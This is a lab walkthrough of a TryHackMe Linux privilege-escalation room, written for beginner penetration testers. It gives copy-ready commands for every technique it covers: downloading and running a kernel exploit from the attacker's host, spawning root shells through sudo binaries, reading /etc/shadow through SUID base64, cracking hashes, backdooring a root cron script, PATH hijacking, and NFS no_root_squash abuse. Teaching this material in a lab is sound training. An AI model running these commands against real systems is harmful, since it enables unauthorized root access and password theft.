Difficulty: Medium | Path: Jr. Penetration Tester
What is Privilege Escalation?
Privilege escalation is when you go from a low level user on a system to a higher level one, usually root. In real pentesting you almost never land on a machine as root straight away. You get in as some low privilege user and then you have to find a way to get root access. That's where privesc comes in.
There are two types you need to know:
Horizontal means you move sideways to another user who has the same level of access as you. This can be useful to grab files or SUID binaries that belong to that user.
Vertical is what most people think of when they hear privilege escalation. You go from a normal user up to root or admin.
Step 1: Enumerate Everything First
Before you try anything, you need to know what you're working with. These are the commands I run first thing every time:
hostname
uname -a
cat /proc/version
cat /etc/issue
ps aux
env
sudo -l
ls -la /etc/cron*
The uname -a output is really important because it gives you the kernel version. An outdated kernel could mean there's a public exploit available for it. The sudo -l command shows you what the current user is allowed to run as sudo, which is often where the easiest wins are.
Technique 1: Kernel Exploits
If the kernel is old enough, there's probably a public exploit for it that can take you straight to root.
uname -a
searchsploit linux kernel 4.x.x # replace with actual version
Once you find a relevant exploit, host it from your machine and pull it onto the target:
# On your machine
python3 -m http.server 8000
# On the target
wget http://YOUR_IP:8000/exploit.c
gcc exploit.c -o exploit
./exploit
id
If you see uid=0(root) after running id then you're done.
Technique 2: Sudo Misconfigurations
This is one of the first things I check. Run sudo -l and see what comes up. If any binary is listed there, go to GTFOBins (https://gtfobins.github.io) and look it up. There's almost always a way to abuse it.
Some quick examples:
# find
sudo find . -exec /bin/sh \; -quit
# vim
sudo vim -c '!sh'
# awk
sudo awk 'BEGIN {system("/bin/sh")}'
# nmap (older versions)
echo "os.execute('/bin/sh')" > shell.nse
sudo nmap --script=shell.nse
Any of these will get you a root shell if that binary shows up in your sudo -l output.
Technique 3: SUID Files
SUID files run with the permissions of whoever owns them rather than whoever is running them. So if root owns a binary and it has the SUID bit set, it runs as root regardless of who executes it.
Find them with:
find / -type f -perm -04000 -ls 2>/dev/null
Then take that list to GTFOBins and check each one. Common ones that are abusable include base64, find, python, and cp.
For example if base64 has SUID set, you can read any file on the system:
base64 /etc/shadow | base64 --decode
That lets you grab the shadow file which has the password hashes.
Technique 4: Cracking Passwords with John the Ripper
Once you have the shadow file, you can crack the hashes offline.
# Get the files
base64 /etc/passwd | base64 --decode > passwd.txt
base64 /etc/shadow | base64 --decode > shadow.txt
# Combine them
unshadow passwd.txt shadow.txt > passwords.txt
# Crack
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
If any user has a weak password John will find it fast. You can then su into that account or use the password to SSH in.
Technique 5: Cron Job Exploitation
Cron jobs are scheduled tasks that run automatically at set times. The interesting ones are cron jobs that run as root but execute a script that you as a low privilege user can write to.
Check what's scheduled:
cat /etc/crontab
ls -la /etc/cron*
If you find something like this running as root:
* * * * * root /opt/backup.sh
And you can write to /opt/backup.sh, just add a line to it:
echo 'chmod +s /bin/bash' >> /opt/backup.sh
Wait for the cron to run, then:
bash -p
id
Root shell.
Technique 6: PATH Hijacking
If a SUID binary calls another program without using the full path (so it calls ls instead of /bin/ls), you can trick it into running your own version instead.
# Create a malicious binary in /tmp
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
# Prepend /tmp to PATH
export PATH=/tmp:$PATH
# Run the SUID binary
./vulnerable_binary
Since your /tmp is checked first in PATH, it runs your fake ls instead, which gives you a shell as root.
Technique 7: NFS Shares
Check if there are any NFS shares with no_root_squash set:
cat /etc/exports
no_root_squash means root on your attacking machine is treated as root on the target too. So you can mount the share, put a SUID binary on it, and run it on the target for a root shell.
# On your attacking machine
showmount -e TARGET_IP
mkdir /tmp/mount
mount -t nfs TARGET_IP:/share /tmp/mount
# Create SUID binary
cp /bin/bash /tmp/mount/bash
chmod +s /tmp/mount/bash
# On the target
/share/bash -p
id
Tools Worth Knowing
LinEnum.sh does automated enumeration and saves a lot of time. Download it from GitHub and run it on the target to get a full picture of what's exploitable.
GTFOBins is essential. Any time you find a binary you can abuse, this site tells you exactly how.
John the Ripper is your go-to for cracking hashes once you have them.
searchsploit lets you search the local exploit database without needing internet on the target.
Final Thoughts
The biggest lesson from this room is that privilege escalation is about patience and thoroughness. You run your enumeration commands, you go through the output carefully, and eventually something sticks out. It's rarely glamorous but it's one of the most important skills you can have as a pentester.
If you haven't done this room yet, go do it. It covers everything you need for CTFs and is basically required knowledge for OSCP.
Room link: https://tryhackme.com/room/linprivesc
Top comments (0)